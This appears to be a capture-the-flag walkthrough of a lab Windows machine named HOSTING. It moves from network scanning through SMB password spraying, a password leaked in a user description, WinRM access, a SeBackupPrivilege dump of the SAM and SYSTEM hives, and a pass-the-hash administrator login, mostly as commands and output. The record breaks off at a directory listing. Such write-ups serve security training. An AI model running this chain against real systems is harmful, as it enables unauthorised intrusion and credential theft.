HOSTING

HOSTING


First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below.

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -I eth0 --localnet
Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.1    d8:44:89:50:2d:a3       (Unknown)
192.168.88.8    08:00:27:98:d4:bf       PCS Systemtechnik GmbH
192.168.88.9    00:e0:4c:69:66:4a       REALTEK SEMICONDUCTOR CORP.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded
                                                                                                               
┌──(kali㉿kali)-[~]
└─$ ping -c1 192.168.88.8
PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data.
64 bytes from 192.168.88.8: icmp_seq=1 ttl=128 time=1.28 ms

--- 192.168.88.8 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.275/1.275/1.275/0.000 ms


After confirming its reachability with ping, you performed a comprehensive nmap scan. The nmap results were critical, revealing:
  • Open Ports: 80 (HTTP), 135 (MSRPC), 139 (NetBIOS-SSN), 445 (Microsoft-DS/SMB), and several high-numbered MSRPC ports.
  • Operating System: Microsoft Windows (likely Windows 10 / Server 2019).
  • Web Server: Microsoft IIS httpd 10.0, with the title "IIS Windows".
  • SMB/NetBIOS Information: The NetBIOS name is HOSTING, and message signing is enabled but not required for SMB.
Attempts to list SMB shares anonymously with smbclient and smbmap failed due to access denied errors, indicating that authentication was required. Similarly, netexec confirmed that anonymous SMB access was denied.
┌──(kali㉿kali)-[~]

└─$ sudo nmap -n -Pn -p- --min-rate 5000 192.168.88.8 -vvv -sC -sV    
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-30 20:13 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
Initiating ARP Ping Scan at 20:13
Scanning 192.168.88.8 [1 port]
Completed ARP Ping Scan at 20:13, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 20:13
Scanning 192.168.88.8 [65535 ports]
Discovered open port 445/tcp on 192.168.88.8
Discovered open port 135/tcp on 192.168.88.8
Discovered open port 139/tcp on 192.168.88.8
Discovered open port 80/tcp on 192.168.88.8
Increasing send delay for 192.168.88.8 from 0 to 5 due to 197 out of 656 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 5 to 10 due to 178 out of 593 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 10 to 20 due to 19 out of 63 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 20 to 40 due to 11 out of 36 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 40 to 80 due to 11 out of 19 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 80 to 160 due to 11 out of 24 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 160 to 320 due to 11 out of 17 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 320 to 640 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 640 to 1000 due to 11 out of 32 dropped probes since last increase.
Discovered open port 49668/tcp on 192.168.88.8
Discovered open port 49664/tcp on 192.168.88.8
Discovered open port 49669/tcp on 192.168.88.8
Discovered open port 49667/tcp on 192.168.88.8
Discovered open port 49666/tcp on 192.168.88.8
Discovered open port 49665/tcp on 192.168.88.8
Discovered open port 49670/tcp on 192.168.88.8
Completed SYN Stealth Scan at 20:13, 22.99s elapsed (65535 total ports)
Initiating Service scan at 20:13
Scanning 11 services on 192.168.88.8
Service scan Timing: About 45.45% done; ETC: 20:15 (0:01:05 remaining)
Completed Service scan at 20:14, 53.84s elapsed (11 services on 1 host)
NSE: Script scanning 192.168.88.8.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 5.22s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.01s elapsed
Nmap scan report for 192.168.88.8
Host is up, received arp-response (0.00080s latency).
Scanned at 2025-04-30 20:13:30 CEST for 82s
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE       REASON          VERSION
80/tcp    open  http          syn-ack ttl 128 Microsoft IIS httpd 10.0
|_http-title: IIS Windows
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 128
49664/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 08:00:27:98:D4:BF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: -2s
| nbstat: NetBIOS name: HOSTING, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:98:d4:bf (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
|   HOSTING<00>          Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   HOSTING<20>          Flags: <unique><active>
| Statistics:
|   08:00:27:98:d4:bf:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-time: 
|   date: 2025-04-30T18:14:45
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 47899/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 64842/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 33952/udp): CLEAN (Timeout)
|   Check 4 (port 51934/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.51 seconds
           Raw packets sent: 114549 (5.040MB) | Rcvd: 65538 (2.622MB)

Now, we can try use listing smb with this command you can see below which is:
  • smbclient -N -L //192.168.88.8 

┌──(kali㉿kali)-[~]
└─$ smbclient -N -L //192.168.88.8                                 
session setup failed: NT_STATUS_ACCESS_DENIED

 
In addition, we should try use smbmap to see if it is possible obtain some information but as you can see below there is nothing with this command:
  • smbmap -u '' -p '' -d HOSTING -H 192.168.88.8
                                                                                                             
┌──(kali㉿kali)-[~]
└─$ smbmap -u '' -p '' -d HOSTING -H 192.168.88.8
    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                    https://github.com/ShawnDEvans/smbmap

[\] Checking for open ports...                                                                                 
[*] Detected 1 hosts serving SMB
[|] Authenticating...                                                                                          
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[/] Authenticating...                                                                                          
[!] Something weird happened on (192.168.88.8) Error occurs while reading from remote(104) on line 1015
[-] Closing connections..                                                                                      
[\] Closing connections..                                                                                      
[|] Closing connections..                                                                                      
[/] Closing connections..                                                                                      
[-] Closing connections..                                                                                      
[*] Closed 1 connections 
As smb port(445) is alive we have to try listing smb with this command which you can see below.

┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u '' -p ''          
SMB         192.168.88.8    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\: STATUS_ACCESS_DENIED


We then shift to web enumeration using gobuster toolkit on the HTTP service (port 80). 
Although you interrupted the scan, it successfully discovered two directories: 
/speed and /Speed. Crucially, we have a list of potential usernames:
  • p.smith 
  • a.krist 
  • m.faeny 
  • k.lendy
This process this list to create a clean usuarios_encontrados file as you can see below.
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.88.8/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.88.8/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/speed                (Status: 301) [Size: 160] [--> http://192.168.88.8/speed/]
/Speed                (Status: 301) [Size: 160] [--> http://192.168.88.8/Speed/]
Progress: 695421 / 882240 (78.82%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 695686 / 882240 (78.85%)
===============================================================
Finished
===============================================================
p.smith@hosting.nyx 
a.krist@hosting.nyx 
m.faeny@hosting.nyx 
k.lendy@hosting.nyx 

Now we have to create a user list to try attack with brute force whose file is usuarios.txt.
┌──(kali㉿kali)-[~]
└─$ sudo nano usuarios.txt

But we need use this toolkit to remove the @ with the command which you can see below.
┌──(kali㉿kali)-[~]
└─$ cat usuarios.txt | tr "@" " "
p.smith hosting.nyx
a.krist hosting.nyx 
m.faeny hosting.nyx 
k.lendy hosting.nyx
 
But we need use this toolkit to remove @ with the command which $1 use only the username you can see below.                                                                                                       
┌──(kali㉿kali)-[~]
└─$ cat usuarios.txt | tr "@" " " | awk '{print$1}'
p.smith
a.krist
m.faeny
k.lendy
                                                                                                         

And then we have to redirect to an txt user whose name is usuarios_encontrados
┌──(kali㉿kali)-[~]
└─$ cat usuarios.txt | tr "@" " " | awk '{print$1}' > usuarios_encontrados
                                                                                                         
┌──(kali㉿kali)-[~]
└─$ cat usuarios_encontrados                                              
p.smith
a.krist
m.faeny
k.lendy


Now we've discovered password which is kissme that you can see in the picture below with brute force
┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u usuarios_encontrados -p /usr/share/wordlists/rockyou.txt  --ignore-pw-decoding 
SMB         192.168.88.8    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\p.smith:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\a.krist:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\m.faeny:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\k.lendy:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\p.smith:12345 STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\a.krist:12345 STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\m.faeny:12345 STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\k.lendy:12345 STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\k.lendy:booboo STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [+] HOSTING\p.smith:kissme 

Now, we have to verify if the password discovered is correct with the command you can see below.
┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u 'p.smith' -p 'kissme'         
SMB         192.168.88.8    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB         192.168.88.8    445    HOSTING          [+] HOSTING\p.smith:kissme

Let's go to listing is it's possible with the command --shares as you can see below in the screen, then we've to found out the IPC$ and we should be able to discover new users.

┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u 'p.smith' -p 'kissme' --shares
SMB         192.168.88.8    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB         192.168.88.8    445    HOSTING          [+] HOSTING\p.smith:kissme 
SMB         192.168.88.8    445    HOSTING          [*] Enumerated shares
SMB         192.168.88.8    445    HOSTING          Share           Permissions     Remark
SMB         192.168.88.8    445    HOSTING          -----           -----------     ------
SMB         192.168.88.8    445    HOSTING          ADMIN$                          Admin remota
SMB         192.168.88.8    445    HOSTING          C$                              Recurso predeterminado
SMB         192.168.88.8    445    HOSTING          IPC$            READ            IPC remota
             
Let's go to listing is it's possible with the command --users as you can see below in the screen, then we've to found out the IPC$ and we should be able to discover new users.                                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u 'p.smith' -p 'kissme' --users 
SMB         192.168.88.8    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB         192.168.88.8    445    HOSTING          [+] HOSTING\p.smith:kissme 
SMB         192.168.88.8    445    HOSTING          -Username-                    -Last PW Set-       -BadPW- -Description-                       
SMB         192.168.88.8    445    HOSTING          Administrador                 2024-09-02 16:24:30 0        
SMB         192.168.88.8    445    HOSTING          administrator                 2024-09-02 17:17:47 0        
SMB         192.168.88.8    445    HOSTING          DefaultAccount                2024-09-02 16:24:40 0        
SMB         192.168.88.8    445    HOSTING          f.miller                      2024-09-02 16:28:55 0        
SMB         192.168.88.8    445    HOSTING          Invitado                      2024-09-02 16:24:48 0        
SMB         192.168.88.8    445    HOSTING          j.wilson                      2024-09-02 16:31:36 0        
SMB         192.168.88.8    445    HOSTING          m.davis                       2024-09-02 16:29:54 0       H0$T1nG123! 
SMB         192.168.88.8    445    HOSTING          p.smith                       2024-09-02 16:18:30 0        
SMB         192.168.88.8    445    HOSTING          WDAGUtilityAccount            <never>             0        
SMB         192.168.88.8    445    HOSTING          [*] Enumerated 9 local users: HOSTING

And now we have to repeat the same process as we have done when the users have been discovered before, we have to create a user list to try attack with brute force whose file is usuarios.txt.
┌──(kali㉿kali)-[~]
└─$ cat usuarios1.txt       
SMB         192.168.88.8    445    HOSTING          Administrador                 2024-09-02 16:24:30 0        
SMB         192.168.88.8    445    HOSTING          administrator                 2024-09-02 17:17:47 0        
SMB         192.168.88.8    445    HOSTING          DefaultAccount                2024-09-02 16:24:40 0        
SMB         192.168.88.8    445    HOSTING          f.miller                      2024-09-02 16:28:55 0        
SMB         192.168.88.8    445    HOSTING          Invitado                      2024-09-02 16:24:48 0        
SMB         192.168.88.8    445    HOSTING          j.wilson                      2024-09-02 16:31:36 0        
SMB         192.168.88.8    445    HOSTING          m.davis                       2024-09-02 16:29:54 0       H0$T1nG123! 
SMB         192.168.88.8    445    HOSTING          p.smith                       2024-09-02 16:18:30 0        
SMB         192.168.88.8    445    HOSTING          WDAGUtilityAccount            <never>             0  
 
And then we have to redirect to an txt user whose name is usuarios_encontrados                                                                                                                                                 
┌──(kali㉿kali)-[~]
└─$ cat usuarios1.txt |awk '{print $5}'
Administrador
administrator
DefaultAccount
f.miller
Invitado
j.wilson
m.davis
p.smith
WDAGUtilityAccount

And then we have to redirect to an txt user whose name is usuarios_nuevos which the command as you can see below.
  • cat usuarios1.txt |awk '{print $5}' > usuarios_nuevos                                                                                                                                                  
┌──(kali㉿kali)-[~]
└─$ cat usuarios1.txt |awk '{print $5}' > usuarios_nuevos
                                                                                                                                                  
┌──(kali㉿kali)-[~]
└─$ cat usuarios_nuevos     
Administrador
administrator
DefaultAccount
f.miller
Invitado
j.wilson
m.davis
p.smith
WDAGUtilityAccount

In addition, we have to try user file with password discovered before as you can see below.
┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u usuarios_nuevos -p 'H0$T1nG123!'                                         
SMB         192.168.88.8    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\Administrador:H0$T1nG123! STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\administrator:H0$T1nG123! STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\DefaultAccount:H0$T1nG123! STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\f.miller:H0$T1nG123! STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [-] HOSTING\Invitado:H0$T1nG123! STATUS_LOGON_FAILURE 
SMB         192.168.88.8    445    HOSTING          [+] HOSTING\j.wilson:H0$T1nG123! 

Now, we have to verify if the password discovered is correct with the command you can see below.
┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u 'j.wilson' -p 'H0$T1nG123!'
SMB         192.168.88.8    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB         192.168.88.8    445    HOSTING          [+] HOSTING\j.wilson:H0$T1nG123!

This is the part more important because we should verify if it is possible enter in the machine for it should execute this command you can see below which is:
  • netexec smb win-rm 192.168.88.8 -u 'p.smith' -p 'kissme'
┌──(kali㉿kali)-[~]
└─$ netexec smb win-rm 192.168.88.8 -u 'p.smith' -p 'kissme'                                             
SMB         192.168.88.8    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB         192.168.88.8    445    HOSTING          [+] HOSTING\p.smith:kissme 
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

This is the part more important because we should verify if it is possible enter in the machine for it should execute this command you can see below which is:
  • netexec smb win-rm 192.168.88.8 -u 'j.wilson' -p 'H0$T1nG123!'
┌──(kali㉿kali)-[~]
└─$ netexec smb win-rm 192.168.88.8 -u 'j.wilson' -p 'H0$T1nG123!'
SMB         192.168.88.8    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)

SMB         192.168.88.8    445    HOSTING          [+] HOSTING\j.wilson:H0$T1nG123! 
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Now, we should be able to try if we can enter in the windows machine, for it, should execute this command you can see below which is:
  •  sudo evil-winrm -i  192.168.88.8 -u 'p.smith' -p 'kissme' 
┌──(kali㉿kali)-[~]
└─$ sudo evil-winrm -i  192.168.88.8 -u 'p.smith' -p 'kissme' 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
                                        
Error: Exiting with code 1

As with the user p.smith we have not able to enter because maybe this user has not perms as you can see at the bottom of screen.

Now, we should be able to try if we can enter in the windows machine, for it, should execute this command you can see below which is:
  • sudo evil-winrm -i 192.168.88.8 -u 'j.wilson' -p 'H0$T1nG123!'
┌──(kali㉿kali)-[~]
└─$ sudo evil-winrm -i 192.168.88.8 -u 'j.wilson' -p 'H0$T1nG123!'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Gotcha! we have to be able to enter into the machine and then start privilege scalation, so we have to discover privileges in this machine with this user for it, we have to execute this commands which you can see below.
  • whoami (discover what people is)
  • ls (to listing folders,files etc)
  • dir (to listing folders,files etc)
  • net user (to see the users which there are in the Windows)
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.wilson\Documents> whoami
hosting\j.wilson
*Evil-WinRM* PS C:\Users\j.wilson\Documents> ls 
*Evil-WinRM* PS C:\Users\j.wilson\Documents> dir
*Evil-WinRM* PS C:\Users\j.wilson\Documents> net user

Cuentas de usuario de \\

We have to discover that there are many users but our objective is be able to convert in Administrator as you can see below.
-------------------------------------------------------------------------------
Administrador            administrator            DefaultAccount
f.miller                 Invitado                 j.wilson
m.davis                  p.smith                  WDAGUtilityAccount
El comando se ha completado con uno o m s errores.

Now we should execute the net user command(net user j.wilson) to see what perms we have.

*Evil-WinRM* PS C:\Users\j.wilson\Documents> 

*Evil-WinRM* PS C:\Users\j.wilson\Documents> net user j.wilson
Nombre de usuario                          j.wilson
Nombre completo                            John Wilson
Comentario
Comentario del usuario
C¢digo de pa¡s o regi¢n                    000 (Predeterminado por el equipo)
Cuenta activa                              S¡
La cuenta expira                           Nunca

Ultimo cambio de contrase¤a                02/09/2024 18:31:36
La contrase¤a expira                       Nunca
Cambio de contrase¤a                       02/09/2024 18:31:36
Contrase¤a requerida                       No
El usuario puede cambiar la contrase¤a     S¡

Estaciones de trabajo autorizadas          Todas
Script de inicio de sesi¢n
Perfil de usuario
Directorio principal
Ultima sesi¢n iniciada                     30/04/2025 20:45:40

Horas de inicio de sesi¢n autorizadas      Todas

Miembros del grupo local                   *Operadores de copia d
                                           *Usuarios
                                           *Usuarios de administr
Miembros del grupo global                  *Ninguno
Se ha completado el comando correctamente.


The most important is that we are Administrators and we can be able to do backups

Now, let's go the execute whoami /priv
*Evil-WinRM* PS C:\Users\j.wilson\Documents> whoami /priv

INFORMACIÓN DE PRIVILEGIOS
--------------------------

Nombre de privilegio          Descripci¢n                                         Estado
============================= =================================================== ==========
SeBackupPrivilege           Hacer copias de seguridad de archivos y directorios Habilitada
SeRestorePrivilege            Restaurar archivos y directorios                    Habilitada
SeShutdownPrivilege           Apagar el sistema                                   Habilitada
SeChangeNotifyPrivilege       Omitir comprobaci¢n de recorrido                    Habilitada
SeUndockPrivilege             Quitar equipo de la estaci¢n de acoplamiento        Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso        Habilitada
SeTimeZonePrivilege           Cambiar la zona horaria                             Habilitada

Now should execute the next commands to obtain the shell as Administrator/System32:
  1. cd .. (to change directory)
  2. mkdir C:\temp (create a folder whose name will be temp)
*Evil-WinRM* PS C:\Users\j.wilson\Documents> cd ..
*Evil-WinRM* PS C:\Users\j.wilson> mkdir C:\temp


    Directorio: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         4/30/2025   8:51 PM                temp

*Evil-WinRM* PS C:\Users\j.wilson> ls


    Directorio: C:\Users\j.wilson

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---          9/2/2024   6:37 PM                3D Objects
d-r---          9/2/2024   6:37 PM                Contacts
d-r---          9/2/2024   7:14 PM                Desktop
d-r---          9/2/2024   7:12 PM                Documents
d-r---          9/2/2024   6:37 PM                Downloads
d-r---          9/2/2024   6:37 PM                Favorites
d-r---          9/2/2024   6:37 PM                Links
d-r---          9/2/2024   6:37 PM                Music
d-r---          9/2/2024   6:38 PM                Pictures
d-r---          9/2/2024   6:37 PM                Saved Games
d-r---          9/2/2024   6:38 PM                Searches
d-r---          9/2/2024   6:37 PM                Videos


Now to obtain the both files which are:
  • Sam(database is  hash password)
  • system(Windows system)
For it, we must execute this commands you can see below which are:
  • cd C:\temp (change directory temp)
  • reg save hklm\SAM C:\temp\sam.hive (export database from windows to our attacker machine) 
*Evil-WinRM* PS C:\Users\j.wilson> cd C:\temp
*Evil-WinRM* PS C:\temp> reg save hklm\SAM C:\temp\sam.hive
La operaci¢n se complet¢ correctamente.

*Evil-WinRM* PS C:\temp> ls

    Directorio: C:\temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         4/30/2025   8:54 PM          57344 sam.hive

Now we have the same with system as you can see below.
Evil-WinRM* PS C:\temp> reg save hklm\SYSTEM C:\temp\system.hive
La operaci¢n se complet¢ correctamente.

*Evil-WinRM* PS C:\temp> ls

    Directorio: C:\temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         4/30/2025   8:54 PM          57344 sam.hive
-a----         4/30/2025   8:56 PM       12001280 system.hive

Now as we have the Sam and system we should download in our machine with the command which is:
  • download sam.hive
  • download system.hive

*Evil-WinRM* PS C:\temp> download sam.hive
                                        
Info: Downloading C:\temp\sam.hive to sam.hive
                                        
Info: Download successful!
*Evil-WinRM* PS C:\temp> download system.hive
                                        
Info: Downloading C:\temp\system.hive to system.hive
                                        
Info: Download successful!

Finally, we have to see the both files in the kali machine you can see below which are:
  • sam.hive
  • system.hive 
┌──(kali㉿kali)-[~]
└─$ ls
1.c                     Desktop      friendly2.txt  id.txt      Oralyzer      reports        sqlmap.txt     usuarios_encontrados
alectodb-passwords.txt  diccionario  GOD-KILLER     kenobi.txt  ParamSpider   reverse.zip.2  ssh            usuarios_nuevos
alectodb-usernames.txt  Docker       headers        kerbrute    password.txt  routersploit   Suggester      usuarios.txt
beef                    Documents    herramientas   log.txt     Pictures      rtl8188eu      system.hive    Videos
bypassamsi              Downloads    hosting.txt    MKBRUTUS    plugins.txt   sam.hive       Templates      volatility3
capturas                Empire       hydra.restore  morata.txt  plugin.zip    scripts        thc-hydra      WinboxExploit
cmdasp.aspx             exploits     ibombshell     Music       prueba.txt    script.sh      TheFatRat      Windows-Exploit
contras

To sum up, let's go to do pass the hash with this command which you can see below:
  • impacket-secretsdump -sam sam.hive -system system.hive LOCAL  
┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL                  
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x827cc782adafc2fd1b7b7a48da1e20ba
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8afe1e889d0977f8571b3dc0524648aa:::
administrator:1002:aad3b435b51404eeaad3b435b51404ee:41186fb28e283ff758bb3dbeb6fb4a5c:::
p.smith:1003:aad3b435b51404eeaad3b435b51404ee:2cf4020e126a3314482e5e87a3f39508:::
f.miller:1004:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
m.davis:1005:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
j.wilson:1006:aad3b435b51404eeaad3b435b51404ee:a6cf5ad66b08624854e80a8786ad6bac:::
[*] Cleaning up...

Now we have to execute the shell to obtain the user flag and root flag, but firstly we have to enter as system32 as you can see below.
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 192.168.88.8 -u administrator -H 41186fb28e283ff758bb3dbeb6fb4a5c
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\administrator\Documents> whoami
hosting\administrator
*Evil-WinRM* PS C:\Users\administrator\Documents> ls
*Evil-WinRM* PS C:\Users\administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\administrator> ls

    Directorio: C:\Users\administrator

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---          7/3/2024   9:15 PM                3D Objects
